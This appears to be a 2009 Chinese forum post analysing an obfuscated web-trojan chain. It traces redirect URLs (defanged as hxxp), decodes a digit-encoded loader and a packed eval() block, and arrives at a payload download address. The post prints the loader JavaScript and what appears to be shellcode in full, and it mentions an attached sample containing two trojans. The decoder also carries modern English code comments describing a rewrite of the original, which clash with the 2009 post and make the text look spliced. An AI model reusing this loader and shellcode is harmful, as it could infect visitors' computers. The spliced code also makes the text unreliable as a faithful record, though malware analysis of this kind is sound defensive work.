本帖最后由 幸福的猪猪 于 2009-12-27 12:42 编辑
本次恶意网马提供地址来自http://log.mtian.net/
hxxp://wokaaa.count.xj.cn/images/images/1.css 本次解析的恶意网址。
关于:hxxp://wokaaa.count.xj.cn/images/images/1.css解密的日志(全体输出 - 6):
Level 0>hxxp://wokaaa.count.xj.cn/images/images/1.css
Level 1>hxxp://jing.count.xj.cn/images/images/mepeg.htm
Level 1>hxxp://chang.count.xj.cn/images/images/tj.htm
Level 1>hxxp://henbu.count.xj.cn/images/images/ff.htm
Level 1>hxxp://wen.count.xj.cn/images/images/of.htm
Level 1>hxxp://ding.count.xj.cn/images/images/bf.htm
这个网马加密的方式跟我以前见到的网马加密的方式不一样。
以hxxp://jing.count.xj.cn/images/images/mepeg.htm 这个网马的源代码为例:
<SCRIPT LANGUAGE="JavaScript">
<!--
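/**
 * Decodes a string made of fixed-width 5-digit groups into text.
 *
 * Each 5-character group g becomes the character whose code is
 * 65535 + bassnum - Number(g). The caller on this page passes 324,
 * so a group decodes to 65859 - g (e.g. "65799" -> 60 -> "<").
 * The analysis on this page swaps document.write for alert so the
 * decoded markup can be read without being executed.
 *
 * Changes from the original: `substr` (deprecated) replaced by `slice`,
 * the string-to-number coercion made explicit, and the quadratic
 * string concatenation replaced by collecting characters and joining.
 *
 * @param {string} datastr - encoded digits; a length that is a multiple of 5 is expected
 * @param {number} bassnum - per-sample offset added before the subtraction
 * @returns {string} the decoded text ("" for empty input)
 */
function unencode(datastr, bassnum) {
  var decodedChars = [];
  for (var i = 0; i < datastr.length; i += 5) {
    var group = datastr.slice(i, i + 5);
    // Number() matches the original implicit coercion: a malformed group
    // gives NaN, which String.fromCharCode maps to "\u0000" instead of throwing.
    var code = 65535 + bassnum - Number(group);
    decodedChars.push(String.fromCharCode(code));
  }
  return decodedChars.join("");
}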
// `webmm` is the encoded page body: a run of 5-digit groups that unencode()
// above turns back into text with offset 324. The alert-box dump further down
// this page shows the result: a small HTML wrapper that loads two more scripts.
var webmm="6579965755657436575065751657976582765846658496579965761657486575965738657976582765827658466584965799657596575465741658276575465759657986582565791657546574165786657916582565797658276584665849657996574465760657456575465747657436582765744657456576065798658206575965753658136575365747657566582065797657996581265744657606574565754657476574365797658466584965799657446576065745657546574765743658276574465745657606579865820657596575365810658136575365747657566582065797657996581265744657606574565754657476574365797658466584965799658126576165748657596573865797658276584665849657996581265755657436575065751657976584665849";
// Decode first, then inject: document.write() puts the decoded markup into the
// page as it loads. Replacing document.write with alert (as this analysis does)
// reveals the markup without running it.
var decodedMarkup = unencode(webmm, 324);
document.write(decodedMarkup);
//-->
</SCRIPT>
用redoce自动解密是解不出来的。(以前用redoce的自动解密功能,一般都能解析出网马的下载地址。不过,这次却解析不出来。)
在网上找了一些资料,最后发现有解析这种加密网页的方法。
就是把document.write替换成javascript:alert再用redoce的MINIHTML查看就可以得出以下代码:
---------------------------
Microsoft Internet Explorer
---------------------------
<html>
<body>
<div id="DivID">
<script src='dj.jpg'></script>
<script src='dj1.jpg'></script>
</body>
</html>
---------------------------
确定
---------------------------
把hxxp://jing.count.xj.cn/images/images/mepeg.htm 里的mepeg.htm替换成dj.jpg 用redoce去解析得出以下代码:
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('35 1=173;35 2=1("%174%175%0%27%176%172%29%171%167%0%70%166%168%169%25%170%3%177");2+=1("%18%34%17%178%0%185%7%10%186%0%187%18%34%17%188%0%184%7%10");2+=1("%183%0%179%18%34%17%41%0%180%7%10%181%0%182%61%59%165%27%56");2+=1("%57%51%16%10%164%0%24%61%59%147%27%56%57%148%16%10%149%0%24");2+=1("%150%146%0%70%145%141%140%142%143%144%151%152%160%161%162%163%159%158%69");2+=1("%154%153%155%156%157%189%0%190%40%223%46%33%23%224%47%225");2+=1("%23%226%46%33%23%222%47%221%217%48%31%216%7%218%58%51%18");2+=1("%10%219%0%21%220%227%228%235%236%237%238%234%40%233%229%230%231");2+=1("%232%215%48%49%38%214%198%199%200%201%197%196%38%192%191%193%139");2+=1("%195%202%0%203%58%31%31%210%8%211%0%212%0%213%209%0%208");2+=1("%204%3%12%205%0%49%52%52%11%206%207%239%135%72%74%73%75");2+=1("%96%92%93%86%69%84%85%3%4%83%3%82%79%80%41%81%3");2+=1("%65%50%45%78%0%8%87%0%11%67%68%63%71%88%0%64%66");2+=1("%25%94%0%95%0%29%25%89%3%90%91%50%45%77%0%8%76");2+=1("%0%11%67%68%63%71%138%0%64%66%125%126%127%124%24%123%3");2+=1("%119%120%121%21%122%128%129%97%136%0%11%21%137%134%32%133%130");2+=1("%131%132%0%118%117%42%104%105%106%103%16%29%102%17%98%0%11");2+=1("%99%100%53%15%33%101%107%108%114%115%0%11%14%116%113%7%0");2+=1("%112%109%0%110%111%194%62%15%54%445%13%39%377%16%43%378%3");2+=1("%36%3%37%5%379%380%44%376%26%19%20%8%375%3%8%371%0");2+=1("%370%13%12%28%3%14%30%372%373%32%374%381%26%19%20%8%382");2+=1("%3%8%390%0%391%13%12%28%3%14%30%392%240%32%393%389%26");2+=1("%19%20%8%388%3%8%384%0%383%13%12%28%3%14%30%385%386");2+=1("%387%62%15%54%369%368%39%351%7%43%352%3%36%3%37%353%4");2+=1("%354%0%350%349%345%344%7%6%5%4%346%0%347%348%355%356%7");2+=1("%6%5%4%364%0%365%366%367%363%7%6%5%4%362%0%358%357");2+=1("%359%360%7%6%5%4%361%0%394%395%429%430%7%6%5%4%431
");2+=1("%3%432%428%427%423%7%6%5%4%422%0%424%425%426%433%7%6");2+=1("%5%4%434%0%441%442%443%444%7%6%5%4%440%3%439%435%436");2+=1("%437%7%6%5%4%438%3%421%420%55%403%7%6%5%4%404%0");2+=1("%405%406%402%401%0%6%5%4%397%0%396%398%399%400%0%6%5");2+=1("%4%407%3%408%416%417%418%0%6%5%4%419%3%415%414%55%410%0");2+=1("%6%5%4%409%3%411%412%413%343%0%6%5%4%342%3%274%275");2+=1("%276%277%0%6%5%4%273%3%272%268%267%269%0%6%5%4%270");2+=1("%0%271%278%279%287%0%6%5%4%288%3%289%290%8%286%3%8");2+=1("%285%3%281%280%12%282%3%4%283%3%284%266%265%248%0%6%5");2+=1("%4%249%0%250%251%247%246%0%6%5%242%241%22%243%244%245%22");2+=1("%252%253%261%9%262%263%264%22%260%259%9%255%254%53%256%257%258");2+=1("%291%292%326%327%9%328%9%329%60%325%324%320%319%321%65%322%323");2+=1("%330%331%338%339%340%341%337%336%332%333%334%335%9%318%9%317%60");2+=1("%9%300%301%302%15%303%4%299%3");35 298=1("%294%293%295%296%297%304%44%305%313%314%315%316%312%311%307%306%308%42%309%310%0");',10,446,'u0000|fucky|s|uFFFF|uE8C3|u08C4|u8300|u0001|uE850|u8B3E|uE800|uD0FF|uE8FF|uFFFE|uC483|u2444|u0002|uE8F8|u0003|u448D|u0424|uFC8B|u408B|u42C7|uC358|uE8D0|u15EB|u0068|uFFE6|uFF00|uC308|u5050|u6800|u3E20|u8B00|var|uE6E8|u83FF|uCC8B|u50FF|uC73E|u000C|u6A2F|uE900|u746E|uE854|u646D|u2063|uC033|uDB33|u50C0|uC8E8|u5353|u8B36|u5004|u5002|u0010|u5700|u5053|u53DC|uDD03|u8B53|u8D15|u7700|uFF33|u33FF|uFF57|u8036|u243C|uFF05|uF88B|uE80A|u0F75|u9005|u7881|u4190|u0255|u001E|u0054|u0401|uC280|u04E8|u11B8|uFF11|uE8E0|uFF17|u408D|u028B|u0241|uFED1|u5753|u3356|u5506|uEC8B|u01FB|uFF68|u7490|uE814|u01CB|uF83B|u0874|u00FF|u8BD0|u24E8|u3E00|u74FF|u2024|uFF3E|u2474|u6E6F|u7568|u6C72|u68C3|uB85E|uE81C|u01EF|u5F10|u75A6|uF300|u56FF|u8357|u08EC|u086A|uF9E8|u02EB|u58D0|u5F5E|uC35B|u3E57|u77FF|u7246|uF48B|u08B9|u4549|u656D|uE838|u025D|u6168|u020B|u3EC0|uB0C0|u3349|uFCC3|uAEF2|u478D|uC933|u0453|u206A|uB0E8|u00E2|uE857|u5FFF|u5BC3|uACE9|uC3E0|u0004|u5B00|uEC81|u47C7|u3E66|uC63E|uB807|u893E|u015F|u00FA|u406A|u05EB|u0800|uF35E|uFFA4|uFFF6|uB9D0|u6A00|une
scape|uE890|u034D|u0020|u54E8|u0038|uA0E8|u78E8|u001A|u58EB|u0030|u5BE8|u64E8|u0046|uF2E8|u0022|u0114|uD48B|uC383|uD98B|u3310|uEB6D|u43C7|uF2EB|u04C0|u7D54|u3E09|u1C89|u8308|u012C|u5100|u60A0|u0339|u3880|u74E9|u8D00|u04A1|u5750|u033B|u19E8|u6400|uF883|u54EC|u0468|u10C2|u5200|u0072|uC78B|u8322|u2F0C|u6302|u2F04|u3E22|u6308|uC083|u3E08|u3322|u3ED2|u5088|u8302|u2200|u66F6|u188A|uDB84|u0374|uEB40|u8005|u7776|u64C0|u33C3|u8530|u78C0|u3E10|u2AE8|u50EC|u3EE8|u000F|u8E68|u0E4E|u3E0C|u708B|u60C3|u3C40|u246C|u3624|u458B|u7CC0|u8334|uAD1C|u0840|uEBC3|u3E0B|u5005|u4FEF|u50B3|uC524|u86E8|u0057|u7268|u6868|uFE42|u9768|uE2C9|u50A3|u9AE8|uB3FE|u5016|uFFFC|uB5E9|uFFE8|uFDA9|u4F68|uFEAB|uFBE0|u72E8|uFE44|u13EB|u656A|u363C|u548B|u7074|u7468|u2F3A|u632F|u632E|u|uFB4F|u8B04|uC503|u8936|u611C|u756F|u782E|u6761|u6D69|u7365|u2E73|u736A|u2F73|u6567|u2E6A|u6E63|u692F|u616D|u1C5A|u4B0C|u038B|u348B|u33F5|uFCC0|u84AC|u3E49|u3BE3|u7828|uD503|u184A|u205A|u74C0|uC107|u3EDF|u5A8B|u0324|u66DD|u7528|u247C|u0DCF|uF803|uF4EB|u3B36|uFE56|uAEE8|uC6E8|u5079|u0197|uEC68|u0397|u46C6|u1B68|uAAE8|uFE40|u04C4|u01AB|u500C|uB2E8|uEF56|uED68|u5036|u8AE8|u015B|u016F|u9EE8|u0183|uAA68|u0DFC|u507C|uFFFD|u6BE8|uB9E9|u0223|u3368|u0032|u7375|uFDE4|u6C64|u4AE8|uFEE0|u6AC3|u686C|u7265|uFDBA|u65E9|u01CF|u7668|u7867|uEB00|uFD90|u6F64|u01F9|u8FE9|u6368|u6873|uF068|u048A|u9E68|u00CF|uBBF9|u5035|uEAE8|uFEE8|u5073|u12E8|u00E3|u7E68|uE2D8|uFE92|u5768|uFE6A|uC2E8|uE068|u305B|u5094|u1E7A|u1A68|uB5A0|u50BB|uD6E8|uFE7E|u8197|u5968|u0133|u62E8|uEF68|uE0CE|u5060|u501C|uDB68|u505F|u76E8|uFEF7|u7868|u4EE8|u011F|u9B5E|u501E|u26E8|uFEA7|uAB68|uFF36|uB068|u2D49|u50DB|u3AE8|u0BE8'.split('|'),0,{}))
接着用redoce的EVAL()解析得出的代码,再用redoce的自动解密得出网马的最终下载地址:hxxp://c.count.xj.cn/images/images/js.js
附上样本(把js后缀名改成rar,可以得出两个木马程序),只是样本是08年10月份的。 |